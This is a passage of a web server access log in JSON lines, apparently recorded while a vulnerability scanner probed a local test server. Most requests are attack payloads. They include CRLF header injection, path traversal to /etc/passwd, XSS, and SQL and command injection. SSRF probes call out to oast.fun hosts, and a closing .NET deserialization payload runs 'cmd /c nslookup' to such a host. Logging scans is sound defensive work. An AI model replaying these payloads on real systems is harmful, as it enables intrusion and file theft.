/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.090","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/297MTur6SXso7L4AVgjUHkW8H7n/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://c9v8h88smpv8c1ig07h0grw1k3hmkb4oc.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /t/index.php?action[]=aaaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c9v8h88smpv8c1ig07h0iwa7qkdbbgfoa.oast.fun%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.007","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup c9v8h8gsmpv8c1qg07h0npofhmhijd6kh.oast.fun\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST 